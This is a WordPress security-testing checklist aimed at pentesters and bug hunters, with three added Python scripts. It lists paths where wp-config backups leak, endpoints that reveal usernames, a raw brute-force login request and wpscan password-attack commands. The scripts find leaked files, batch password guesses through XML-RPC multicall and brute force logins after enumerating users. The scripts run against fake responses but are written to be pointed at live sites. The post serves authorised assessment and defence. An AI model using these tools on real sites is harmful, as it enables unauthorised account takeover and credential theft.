WordPress Security Checklist

WordPress is a very popular CMS (Content Management System) used to build blogs, e-commerce sites and many other kinds of websites. By some estimates WordPress powers more than 30% of all websites on the internet. It is easy to install, easy to use and easy to manage, and that is the main reason for its popularity.

As usage grows, so do the security risks and the number of attacks. WordPress itself is still considered reasonably safe to use: it is open source and maintained by a large community of developers, security researchers and maintainers, and identified vulnerabilities are usually patched quickly. In practice most compromises come from outdated or misconfigured installations, plugins and themes rather than from the core code, which is why the checks below concentrate on those.

This post covers the most common weak spots in a website running WordPress. The points below should be checked thoroughly before (and after) deploying a WordPress site. As penetration testers we want to find these flaws inside our target scope, and bug hunters want to find them on WordPress sites in bug bounty programs and report them for rewards. Let's go through the checklist.

WordPress Security Testing Checklist

      • Check whether wp-config.php itself is readable: it holds the database credentials, the authentication keys and salts, and often third-party API keys. Then check for backup and editor-temp copies of the file with the extensions below. Editors, deployment scripts and manual backups leave these behind, and because they do not end in .php the web server returns them as plain text instead of executing them. Do not trust a 200 status alone; confirm the body actually contains define('DB_PASSWORD' ...) or similar, because many hosts answer every unknown path with a 200 "not found" page.
        • http://target.com/.wp-config.php.swp
        • http://target.com/wp-config.inc
        • http://target.com/wp-config.old
        • http://target.com/wp-config.txt
        • http://target.com/wp-config.html
        • http://target.com/wp-config.php.bak
        • http://target.com/wp-config.php.dist
        • http://target.com/wp-config.php.inc
        • http://target.com/wp-config.php.old
        • http://target.com/wp-config.php.save
        • http://target.com/wp-config.php.swp
        • http://target.com/wp-config.php.txt
        • http://target.com/wp-config.php.zip
        • http://target.com/wp-config.php.html
        • http://target.com/wp-config.php~
      • Check for directory listing: fuzz directories and endpoints with a WordPress-specific wordlist and look for responses whose title starts with "Index of /". A suitable wordlist is
        https://github.com/jhaddix/SecLists/blob/master/Discovery/Web-Content/CMS/wordpress.fuzz.txt
      • Check whether XML-RPC is enabled; the endpoint normally lives at https://example.com/xmlrpc.php and answers a GET with "XML-RPC server accepts POST requests only." when it is active. An enabled endpoint allows password brute forcing with many attempts per HTTP request through system.multicall, and its pingback.ping method can be abused for SSRF and DDoS. Detailed exploitation can be found at https://hackerone.com/reports/752073
      • Enumerate WordPress usernames from the following endpoints. The REST endpoint lists users who have published posts without any authentication; with pretty permalinks enabled, ?author=N redirects to /author/<username>/ for every existing user ID, and with plain permalinks the author archive page itself reveals the name:
        • http://target.com/wp-json/wp/v2/users
        • http://target.com/?rest_route=/wp/v2/users
        • http://target.com/?author=1
      • Once the list of users is collected, we can brute force passwords against the login form using the found usernames. The request must carry the wordpress_test_cookie that GET /wp-login.php sets, otherwise WordPress rejects every attempt with a "cookies are blocked" error regardless of the password. A successful login answers 302 to redirect_to and sets a wordpress_logged_in_* cookie; a failed one re-renders the form with 200.
        • POST /wp-login.php HTTP/1.1
          Host: target.com
          Content-Type: application/x-www-form-urlencoded
          Cookie: wordpress_test_cookie=WP%20Cookie%20check

          log=admin&pwd=BRUTEFORCE_IN_HERE&wp-submit=Log+In&redirect_to=http%3A%2F%2Ftarget.com%2Fwp-admin%2F&testcookie=1
      • Check whether user registration is enabled at http://example.com/wp-login.php?action=register. If open registration is on, also check which role new accounts receive (Settings > General > New User Default Role); anything above Subscriber hands every registrant extra privileges.
      • Check for installed plugins and their versions.
          – Use tools like wpscan (its --enumerate option with vp,vt lists plugins and themes with known vulnerabilities).
          – The version can also be read directly from the plugin's readme ("Stable tag:" line) at https://target.com/wp-content/plugins/PLUGINNAME/readme.txt; if that file is missing, try changelog.txt or readme.md in the same directory.
          – If you find an outdated core, plugin or theme, look for the matching advisory or exploit at https://wpscan.com or exploit-db.com
      • Check for log files at http://target.com/wp-content/debug.log. The file is written when WP_DEBUG_LOG is enabled in wp-config.php and leaks absolute server paths, failing SQL queries and sometimes credentials or tokens that plugins print in error messages.
      • Check which PHP version the site runs. It is often disclosed in the X-Powered-By response header (visible in Burp Suite or in the browser's developer tools) and occasionally through an exposed phpinfo() page. Based on the PHP version, look for known vulnerabilities and check whether that version is still supported.
      • Check the active theme and any inactive themes as well as the plugins; wpscan can scan all of them for known vulnerabilities directly.
      • The administrative user is often still named admin, in which case we can brute force its password with wpscan as below (wpscan picks the attack method itself; --password-attack xmlrpc-multicall forces the amplified XML-RPC path when it is available):

        wpscan --url http://example.com --passwords rockyou.txt --usernames admin
      • If you cannot find a WordPress username, do not worry, we can still enumerate one with wpscan:

        wpscan --url http://example.com --enumerate u
      • Check the publicly released vulnerabilities for the detected WordPress core version and for every plugin and theme in the WPScan vulnerability database (https://wpscan.com) and on exploit-db.com.
      • Check for directory listing with Google dorks as well, which finds listings that Google has already indexed, for example:
        intitle:"Index of /wp-admin" site:target.com
        intitle:"Index of /wp-content/uploads" site:target.com
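The wp-config backup check, the directory listing check, the debug.log check and the plugin readme version check above all share one recipe: request a list of candidate paths and decide from the response body whether something actually leaked. The script below is an added example (not code from the original post) that does this in Python. The target host, the plugin slugs and the canned responses in fake_fetch() are constructed demo data; in the field, replace fake_fetch with a wrapper around requests.get.

```python
"""Probe a WordPress site for exposed wp-config.php backups, directory
listings, wp-content/debug.log and plugin readme.txt files, classifying
each response by its content rather than by status code.

Added example, not code from the original checklist. The base URL, the
plugin slugs and the canned responses in fake_fetch() are constructed demo
data; in the field pass a wrapper around requests.get as `fetch`.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple
from urllib.parse import urljoin

# Backup / editor-temp variants of wp-config.php that a web server serves
# as plain text instead of executing.
WP_CONFIG_VARIANTS = [
    ".wp-config.php.swp", "wp-config.inc", "wp-config.old", "wp-config.txt",
    "wp-config.html", "wp-config.php.bak", "wp-config.php.dist",
    "wp-config.php.inc", "wp-config.php.old", "wp-config.php.save",
    "wp-config.php.swp", "wp-config.php.txt", "wp-config.php.zip",
    "wp-config.php.html", "wp-config.php~",
]
LISTING_DIRS = ["wp-admin/", "wp-content/uploads/", "wp-content/plugins/", "wp-includes/"]

# Content signatures. A bare HTTP 200 proves nothing: many hosts answer every
# path with a themed "not found" page, which would flag all variants above.
WPCONFIG_RE = re.compile(r"define\(\s*['\"](DB_PASSWORD|DB_NAME|AUTH_KEY)['\"]", re.I)
LISTING_RE = re.compile(r"<title>\s*Index of /", re.I)
DEBUGLOG_RE = re.compile(r"PHP (Notice|Warning|Fatal error|Deprecated):", re.I)
STABLE_TAG_RE = re.compile(r"^\s*Stable tag:\s*([\w.\-]+)", re.I | re.M)

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status, body)


def classify(status: int, body: str) -> Optional[str]:
    """Name the finding a response represents, or None if it is uninteresting."""
    if status != 200:
        return None
    if WPCONFIG_RE.search(body):
        return "wp-config leak"
    if LISTING_RE.search(body):
        return "directory listing"
    if DEBUGLOG_RE.search(body):
        return "debug.log exposed"
    return None


def plugin_version(readme_body: str) -> Optional[str]:
    """Extract the 'Stable tag' version from a plugin readme.txt, if present."""
    m = STABLE_TAG_RE.search(readme_body)
    return m.group(1) if m else None


def probe(base_url: str, fetch: Fetcher, plugins: List[str]) -> Dict[str, str]:
    """Request every candidate path and return {url: finding} for real hits only."""
    findings: Dict[str, str] = {}
    for path in WP_CONFIG_VARIANTS + LISTING_DIRS + ["wp-content/debug.log"]:
        url = urljoin(base_url, path)
        kind = classify(*fetch(url))
        if kind:
            findings[url] = kind
    for slug in plugins:
        url = urljoin(base_url, f"wp-content/plugins/{slug}/readme.txt")
        status, body = fetch(url)
        version = plugin_version(body) if status == 200 else None
        if version:
            findings[url] = f"plugin {slug} version {version}"
    return findings


# Constructed responses standing in for a live target (assumption, not real data).
CANNED = {
    "http://target.example/wp-config.php.bak":
        (200, "<?php\ndefine( 'DB_NAME', 'wp' );\ndefine( 'DB_PASSWORD', 's3cret' );\n"),
    "http://target.example/wp-content/uploads/":
        (200, "<html><head><title>Index of /wp-content/uploads</title></head></html>"),
    "http://target.example/wp-content/debug.log":
        (200, "[01-Jan-2024 10:00:00 UTC] PHP Warning:  Undefined index in /var/www/html/wp-content/plugins/x/x.php on line 12\n"),
    "http://target.example/wp-content/plugins/contact-form-7/readme.txt":
        (200, "=== Contact Form 7 ===\nStable tag: 5.1.6\nRequires at least: 5.9\n"),
}


def fake_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in: unknown paths get a 200 'soft 404' page, as many real hosts do."""
    return CANNED.get(url, (200, "<html><title>Page not found</title></html>"))


def demo() -> Dict[str, str]:
    return probe("http://target.example/", fake_fetch, ["contact-form-7", "akismet"])


if __name__ == "__main__":
    for url, finding in demo().items():
        print(f"{finding:36s} {url}")
```

Classifying by content instead of status is the caveat that matters here: the fake host answers every unknown path with a 200 branded error page, and only the four responses that carry a real signature are reported, not the fifteen wp-config variants.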

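An added example, not taken from the original post or from the linked report, of the XML-RPC check and the system.multicall amplification described above: it confirms through system.listMethods that wp.getUsersBlogs is exposed, then packs a whole password list into one system.multicall request and maps the batched results back to the guesses. The target URL, the valid credential pair and fake_post() are constructed stand-ins for a real endpoint.

```python
"""Check whether xmlrpc.php is enabled and, if so, test many passwords in a
single HTTP request by batching wp.getUsersBlogs calls inside
system.multicall, then parse the batched response.

Added example, not code from the original checklist. The HTTP layer is an
injected callable post(url, xml_body) -> response_body so the logic runs
offline against the constructed fake_post() below; in the field wrap
requests.post with Content-Type: text/xml. The target URL and the valid
credential pair are assumptions used only by the fake server.
"""
import xmlrpc.client as xc
from typing import Callable, List, Optional, Tuple
from xml.parsers.expat import ExpatError

Post = Callable[[str, str], str]  # (url, request xml) -> response xml


def xmlrpc_enabled(post: Post, url: str) -> bool:
    """system.listMethods returns the method list when XML-RPC is on. A disabled
    endpoint yields a fault, an HTML error page (not valid XML-RPC) or a method
    list without wp.getUsersBlogs; all of those count as 'not usable'."""
    request = xc.dumps((), methodname="system.listMethods")
    try:
        (methods,), _ = xc.loads(post(url, request))
    except (xc.Fault, xc.ResponseError, ExpatError, ValueError):
        return False
    return isinstance(methods, list) and "wp.getUsersBlogs" in methods


def multicall_body(user: str, passwords: List[str]) -> str:
    """One system.multicall request carrying one wp.getUsersBlogs call per guess.
    WordPress does not cap the number of sub-calls by default, which is the
    amplification: hundreds of guesses cost one request and one log line."""
    calls = [{"methodName": "wp.getUsersBlogs", "params": [user, pw]} for pw in passwords]
    return xc.dumps((calls,), methodname="system.multicall")


def parse_multicall(response_xml: str, passwords: List[str]) -> Optional[str]:
    """Map each sub-result back to its guess. A failed login is a struct with
    faultCode 403 ('Incorrect username or password.'); a successful one is a
    one-element array wrapping the user's blog list (possibly empty on multisite)."""
    (results,), _ = xc.loads(response_xml)
    for pw, result in zip(passwords, results):
        if isinstance(result, dict) and "faultCode" in result:
            continue
        if isinstance(result, list):
            return pw
    return None


# ---- constructed offline stand-in for a WordPress XML-RPC server (assumption) ----
XMLRPC_URL = "http://target.example/xmlrpc.php"
VALID = ("admin", "Winter2024!")


def fake_post(url: str, body: str) -> str:
    params, method = xc.loads(body)
    if method == "system.listMethods":
        return xc.dumps((["system.multicall", "system.listMethods",
                          "wp.getUsersBlogs", "pingback.ping"],), methodresponse=True)
    if method == "system.multicall":
        results = []
        for call in params[0]:
            user, pw = call["params"]
            if call["methodName"] == "wp.getUsersBlogs" and (user, pw) == VALID:
                results.append([[{"blogid": "1", "blogName": "target", "isAdmin": True,
                                  "url": "http://target.example/", "xmlrpc": url}]])
            else:
                results.append({"faultCode": 403, "faultString": "Incorrect username or password."})
        return xc.dumps((results,), methodresponse=True)
    return xc.dumps(xc.Fault(-32601, "server error. requested method not found"), methodresponse=True)


def demo() -> Tuple[bool, Optional[str]]:
    guesses = ["password", "admin", "letmein", "Winter2024!", "qwerty"]
    enabled = xmlrpc_enabled(fake_post, XMLRPC_URL)
    hit = parse_multicall(fake_post(XMLRPC_URL, multicall_body("admin", guesses)), guesses) if enabled else None
    return enabled, hit


if __name__ == "__main__":
    print(demo())
```

On the defensive side the same script doubles as a verification check: after disabling XML-RPC (or blocking system.multicall at the web server or WAF) xmlrpc_enabled() should return False, and a multicall that still answers with per-call faults instead of a single fault means the amplification path is still open.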

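The user enumeration endpoints and the wp-login.php request from the checklist, as an added example that is not part of the original post: it parses the REST user list and the ?author=N redirect, then runs the login loop and judges success by the wordpress_logged_in_ cookie rather than by status code or page text. All URLs, users and responses in fake_get()/fake_post() are constructed, and the Set-Cookie header is modelled as a single string, which is a simplification of real multi-header responses.

```python
"""Enumerate WordPress usernames (REST API and ?author=N redirects) and then
test them against wp-login.php, detecting a successful login by the session
cookie WordPress sets rather than by status code or page text.

Added example, not code from the original checklist. The HTTP layer is
injected as get/post callables so the logic runs offline against the
constructed responses in fake_get()/fake_post(); in the field wrap a
requests.Session, which also keeps the wordpress_test_cookie (see below).
"""
import json
import re
from typing import Callable, Dict, Iterable, List, Optional, Tuple
from urllib.parse import urljoin

Headers = Dict[str, str]
Response = Tuple[int, Headers, str]            # (status, headers, body)
Get = Callable[[str], Response]
Post = Callable[[str, Dict[str, str]], Response]

AUTHOR_SLUG_RE = re.compile(r"/author/([^/?#]+)/?", re.I)


def users_from_rest(body: str) -> List[str]:
    """User slugs from a /wp-json/wp/v2/users body; empty list if it is not JSON."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    return [u["slug"] for u in data if isinstance(u, dict) and "slug" in u]


def user_from_author_redirect(headers: Headers) -> Optional[str]:
    """?author=N redirects to /author/<slug>/ when the ID exists; pull the slug out."""
    m = AUTHOR_SLUG_RE.search(headers.get("Location", ""))
    return m.group(1) if m else None


def enumerate_users(base: str, get: Get, author_ids: Iterable[int] = range(1, 6)) -> List[str]:
    found: List[str] = []
    for path in ("wp-json/wp/v2/users", "?rest_route=/wp/v2/users"):
        status, _, body = get(urljoin(base, path))
        if status == 200:
            found += [u for u in users_from_rest(body) if u not in found]
    for n in author_ids:
        status, headers, _ = get(urljoin(base, f"?author={n}"))
        user = user_from_author_redirect(headers) if status in (301, 302) else None
        if user and user not in found:
            found.append(user)
    return found


def login_succeeded(status: int, headers: Headers) -> bool:
    """On success wp-login.php answers 302 to redirect_to and sets
    wordpress_logged_in_<hash>; on failure it re-renders the form with 200.
    Requiring the cookie avoids false positives from hosts that 302 everything."""
    return status == 302 and "wordpress_logged_in_" in headers.get("Set-Cookie", "")


def brute_force(base: str, post: Post, users: Iterable[str],
                passwords: Iterable[str]) -> Optional[Tuple[str, str]]:
    """Try each user/password pair; return the first working pair or None."""
    login_url = urljoin(base, "wp-login.php")
    passwords = list(passwords)
    for user in users:
        for pw in passwords:
            form = {"log": user, "pwd": pw, "wp-submit": "Log In",
                    "redirect_to": urljoin(base, "wp-admin/"), "testcookie": "1"}
            # The real client must send Cookie: wordpress_test_cookie=WP%20Cookie%20check
            # (set by GET /wp-login.php) or WordPress rejects every attempt with a
            # "cookies are blocked" error regardless of the password.
            status, headers, _ = post(login_url, form)
            if login_succeeded(status, headers):
                return user, pw
    return None


# ---- constructed offline stand-ins for a live target (assumptions, not real data) ----
BASE = "http://target.example/"
CANNED_GET: Dict[str, Response] = {
    BASE + "wp-json/wp/v2/users": (200, {}, json.dumps([{"id": 1, "slug": "admin"}, {"id": 3, "slug": "editor"}])),
    BASE + "?author=1": (301, {"Location": BASE + "author/admin/"}, ""),
    BASE + "?author=2": (301, {"Location": BASE + "author/jsmith/"}, ""),
}
VALID = ("jsmith", "Winter2024!")


def fake_get(url: str) -> Response:
    return CANNED_GET.get(url, (404, {}, "Not Found"))


def fake_post(url: str, form: Dict[str, str]) -> Response:
    if (form["log"], form["pwd"]) == VALID:
        return 302, {"Location": form["redirect_to"],
                     "Set-Cookie": "wordpress_logged_in_abc123=jsmith%7C1700000000%7Ctoken%7Chmac; HttpOnly"}, ""
    return 200, {}, '<div id="login_error">Error: The password you entered is incorrect.</div>'


def demo() -> Tuple[List[str], Optional[Tuple[str, str]]]:
    users = enumerate_users(BASE, fake_get)
    return users, brute_force(BASE, fake_post, users, ["password", "admin123", "Winter2024!"])


if __name__ == "__main__":
    print(demo())
```

Note that the REST endpoint only lists admin and editor, while ?author=2 reveals jsmith, a user with no published posts; running both sources is what finds the account that the weak password belongs to.
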
Tools For WordPress Security

Now we will discuss a few of the tools used for scanning WordPress for security vulnerabilities.

1. WPScan

WPScan is a widely used open-source WordPress security scanner designed for black-box testing of WordPress installations. It enumerates the core version, plugins, themes and users, checks them against its vulnerability database and can run password attacks, which helps site owners and administrators improve the security posture of their WordPress-powered websites.

2. Sucuri Plugin

Sucuri is a popular WordPress security plugin that offers malware scanning, file integrity monitoring, activity auditing and a web application firewall that blocks exploitation attempts before they reach the site. The service also exposes an API that general users can integrate with.

3. Wordfence Plugin

Wordfence is another popular WordPress security plugin with malware scanning, firewall protection and brute force attack prevention (login rate limiting and lockouts). It also offers an API that can be integrated with our own tooling, and its scanning covers themes, plugins and WordPress core.

4. Nessus

Nessus is an application and network vulnerability assessment tool that can also find underlying WordPress vulnerabilities. Use a web application scan policy so that the tool crawls and tests the WordPress site itself rather than only the host's open ports and services.
